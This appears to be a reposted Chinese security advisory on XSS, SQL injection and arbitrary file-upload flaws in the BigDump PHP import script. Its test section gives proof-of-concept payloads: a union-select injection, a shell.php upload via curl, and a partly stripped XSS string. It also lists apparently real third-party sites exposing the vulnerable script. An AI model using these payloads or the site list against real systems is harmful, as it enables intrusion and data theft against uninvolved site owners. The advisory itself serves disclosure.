作者:阿宅是时候听孙燕姿思_542 | 来源:互联网 | 2023-06-15 22:34
发布日期:2012-11-28
更新日期:2012-12-04
受影响系统:
ozerov BigDump 0.29b
描述:
——————————————————————————–
BUGTRAQ ID: 56744
BigDump 是由德国人Alexey Ozerov 用PHP语言开发的一个工具脚本,用来导入批量mysql数据。
BigDump 0.29b、0.32b及其他版本在实现上存在跨站脚本、SQL注入、任意文件上传漏洞,利用这些漏洞攻击者可窃取COOKIE身份验证凭证、上传任意文件、访问或修改数据、利用下层数据库内的其他漏洞。
链接:http://packetstormsecurity.org/files/118463/bigdump032b-shellxsssql.txt
*>
测试方法:
——————————————————————————–
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/bigdump.php?start= [SQL]
http://www.example.com/bigdump.php?start= [XSS]
http://www.example.com/bigdump.php [File Upload]
# Expl0it/P0c ###################
http://site.com/bigdump.php?start=
http://site.com/bigdump.php?start=
http://site.com/bigdump.php
# Expl0it/P0c/upload ###############
Input $ch = curl_init(“http://site.com/bigdump.php?start=shell.php”)
Output $ch = curl_init(“http://site.com/bigdump/uploads/shell.php”)
# Expl0it/P0c/Sql ###################
+union+select+1,2,3,4,5,6,7,8,9,10–+
# Expl0it/P0c/Xss ###################
“>
# Vulnerability/C0de/###################
?action=step3″ enctype=”multipart/form-data”>
Dump file:
# Samples/Arbitrart_Upload/Sql/Xss ####################
http://www.fs7a.net/vb/1/bigdump.php
http://www.lis186.com/dump/bigdump.php
http://bigw3.com/bigdump.php
http://twin.skr.jp/bigdump/bigdump.php
http://www.fs7a.net/vb/1/bigdump.php?start=%
http://www.lis186.com/dump/bigdump.php?start=%
http://bigw3.com/bigdump.php?start=%
http://twin.skr.jp/bigdump/bigdump.php?start=%
建议:
——————————————————————————–
厂商补丁:
ozerov
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
京公网安备 11010802041100号